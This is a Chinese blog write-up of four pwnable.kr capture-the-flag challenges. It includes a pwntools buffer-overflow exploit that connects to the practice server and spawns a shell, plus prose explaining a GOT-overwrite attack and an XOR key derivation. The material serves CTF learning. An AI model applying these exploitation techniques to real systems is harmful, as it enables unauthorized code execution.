pwnable.kr bof,flag,passcode,random

于 2023-10-06 18:19:26 发布
阅读量59 收藏
点赞数
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51890658/article/details/133614124
版权

目录

1.bof

2.flag

3.passcode

4.random

1.bof

32位,开了canary,拖入ida分析

只要把func函数的参数改为0xcafebabe即可get shell

通过动态调离参数的距离为0x34

EXP:

from pwn import *
from LibcSearcher import *
from pwnlib import *
import base64
from ctypes import *

sh=remote("pwnable.kr",9000)
#sh=process("./rbp")
#elf=ELF("./rbp")
libc=ELF("/lib32/libc.so.6")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda :sh.interactive()
U64=lambda :u64(sh.recv(6)+"\x00"*2)


#un("me : \n")
sl("a"*0x34+p32(0xCAFEBABE))


inter()
 

2.flag

file分析加了upx壳,通过upx指令脱壳

脱壳后拖入ida,获得flag

3.passcode

ssh连接进去,简单的分析了源代码,发现存在覆盖漏洞

通过gdb分析,Welcome函数中name的输入可以用来覆盖passcode1的值

在name里直接写入fllush的got表到passcode1中,name的起始地址在[ebp-0x70]处,passcode1位于[ebp-0x10]处,之间相差96个字节。welcome函数中如果要输入100个字节的话,最后四位可以覆盖掉passcode1的地址,然后在第一个scanf输入时因为没有&符,所以可以把fflush的got表改为system("/bin/cat flag")的地址,然后再执行fllush函数时即可获得flag

4.random

random是固定的随机值,随机值为1804289383,在if判断中自己输入的值异或随机值=0xdeadbeef就可以获得flag 

大家先了解下异或,是一个很简单的运算符,例如 两个相同的数异或等于0  a^a=0 如果a^b=c 则a^c=b c^b=a

所以通过1804289383^0xdeadbeef就等于key(3039230856),然后运行random获得shell

Binary..
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
pwnable.krpasscode
Jason_ZhouYetao的博客
06-27 290
这题主要是的难点是GOT覆写技术的运用。这里推荐几篇文章有关栈溢出和GOT表和PLT表知识的文章。 栈溢出从入门到放弃(上) 栈溢出从入门到放弃(下) GOT表和PLT表知识详解 话不多说,先看正题。 #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passco...
icecast_libshout_bof.nasl
11-08
icecast_libshout_bof
pwnable.kr passcode
r250414958的博客
04-21 373
题目来自pwnable.kr 里面的思路是通过学习别人的文章获得的,作为个人的学习记录一下 题目是这样的 passcode SSH连接一下 看看有什么文件 可以看到有三个文件,其中 flag 只对创建者 passcode_pwn 和 root 可读,而我们登录的用户是 passcode(从连接时的用户名或使用 whoami 命令可以得知),因此是没有权限读这个文件的。passcode 对有所有...
pwnable.kr-passcode
qq_35661990的博客
09-18 555
这道题的难点在于GOT表覆写,理解了GOT表和PLT表的关系就比较好做了。 函数在调用printf等函数的时候需要访问PLT表,而PLT表中储存的是GOT表对应项的地址。 另外一点就是scanf的参数如果没有加&地址符,就会把参数所在栈内的4个字节(我认为是因为题目中要传入%d是四字节的int型吧)当作地址,然后把缓冲区的数据输入进去。(在IDA中看,就是有加地址符,程序会执行lea指...
pwnable.krpasscode
搓雪小怪兽的工作室
08-26 243
题目描述 Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.kr -p2...
pwnable.krpasscode
think_ycx的专栏
07-09 530
下载程序scp -P 2222 -p passcode@pwnable.kr:/home/passcode/* ./漏洞信息程序main函数中,welcome和login存在栈复用,welcome调用gets向ebp-0x70读入100个字符。 login中scanf没有取地址,因此会把[ebp-10h]和[ebp-0xch]的内容当成要写入的地址。在welcome中,我们有一次布置数据的机会,可...
bof.rar_BOF
09-21
MFC 按钮的小例子,初学者很适用,希望大家一起享用
BoF.tar.gz_BOF_bag of features
09-19
Source Code for bag of features, developed in Matlab
bof_recognition.rar_BOF_filter bank
07-14
Filter bank representation methods for speech recognition
matlab.zip_BOF_炼钢_炼钢 matlab_转炉_转炉炼钢
09-21
matlab程序。转炉炼钢相关因素的优化,采用的方法是神经网络。
[pwnable.kr]passcode
iekuil的博客
10-03 279
->plt[1]第一条指令jmp *got[3] --> plt[1]第二条指令压栈 --> plt[1]第三条指令jmp plt[0] --> plt[0]第一条指令再压栈 --> plt[0]第二条指令jmp *got[2] --> 进入动态链接函数 --> 回写got表&调用目标函数。got[3],即804a000处实际存的值是8048426,即plt[1]中第二条指令的位置,除了plt[0]和got[0]、got[1]、got[2]有特殊作用外,
pwnable.kr - passcode
ACdream
10-12 506
pwnable.kr passcode
pwnable.kr [Toddler's Bottle] - passcode
Re:Umiade.tr
03-27 512
Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.k
pwnable.kr-passcode WP
Casuall的博客
03-30 465
首先用ssh连进去,一个可执行文件,一个源码文件,一个flag文件,先执行passcode程序,让你输入name,passcode1,passcode2,如图。 我们先用scp命令把文件拷贝下来,scp -P2222 passcode@pwnable.kr:passcode . ,注意后面有一个点,表示拷贝到当前目录的意思。然后看一下源码 #include <stdio.h> #in...
pwnable.kr wp passcode
fa1c4的blog
01-17 217
题目 Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.kr -p2222 (pw:guest) 题解 #include <stdio.h> #include &lt
pwnable.krpasscode summary
Bill
04-23 684
本人写这篇博客完全是为了方便以后查证,若能帮上各位的忙,在线非常宽慰. 关于pwnable.kr上的passcode,这博客写的很到位,大家不妨去看一下:passcode.我在这里只是补充几个问题,再将整个过程简单化而已. 1.plt表和got表的关系   plt表—->got表.当程序中有需要库函数时,该plt和got表上场了.我们来举一个简单的例子(test.c):#include <st
pwnable.kr第五题:passcode
10-04 200
0x000打开环境 ①查看源码: 1 #include 2 #include 3 4 void login(){ 5 int passcode1; 6 int passcode2; 7 8 printf("enter passcode1 : "); 9 scanf("%d"...
使用pandas BOF
最新发布
05-15
在 Pandas 中,BOF 指的是 Business Offset,是一种处理时间序列数据的方法。BOF 提供了一种方便的方法来进行时间聚合,可以帮助我们将时间序列数据按照业务需求进行划分和聚合。 使用 Pandas 的 BOF,需要用到 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值